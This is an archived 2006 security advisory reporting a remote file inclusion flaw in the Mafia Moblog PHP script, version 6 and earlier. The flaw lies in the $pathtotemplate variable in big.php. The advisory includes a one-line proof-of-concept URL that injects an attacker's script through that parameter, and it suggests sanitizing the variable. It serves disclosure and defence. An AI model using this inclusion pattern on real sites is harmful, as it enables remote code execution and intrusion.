TUCoPS :: Web :: Blogs :: b06-4160.htm

Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability
Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability
Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability



-------------------------------------------------------------------------------------------=0D
Mafia Moblog pathtotemplate Remote File Inclusion=0D
-------------------------------------------------------------------------------------------=0D
Author   : Sh3ll=0D
Date     : 2006/04/30=0D
HomePage : http://www.sh3ll.ir=0D 
Contact  : sh3ll[at]sh3ll[dot]ir=0D
-------------------------------------------------------------------------------------------=0D
Affected Software Description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Application : Mafia Moblog=0D
version     : 6=0D
Venedor : http://mafia.pearlabs.org=0D 
Class       : Remote File Inclusion=0D
Risk        : High=0D
Summary     : =0D
A Free, Fully Customizeable, Open-Source MoBlog script that will run on any =0D
platform that is PHP and MySQL compatible. =0D
-------------------------------------------------------------------------------------------=0D
Vulnerability:=0D
~~~~~~~~~~~~~=0D
The problem exists is in the big.php when used the variable $pathtotemplate in a =0D
include() function without being Declared.=0D
----------------------------------------big.php--------------------------------------------=0D
...=0D
=0D
...=0D
-------------------------------------------------------------------------------------------=0D
PoC:=0D
~~~=0D
http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script]=0D 
=0D
Solution:=0D
~~~~~~~~=0D
Sanitize Variabel $pathtotemplate in big.php=0D
-------------------------------------------------------------------------------------------=0D
Note:=0D
~~~~=0D
venedor contacted, but no response. so do a dirty patch.=0D
-------------------------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena=0D
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH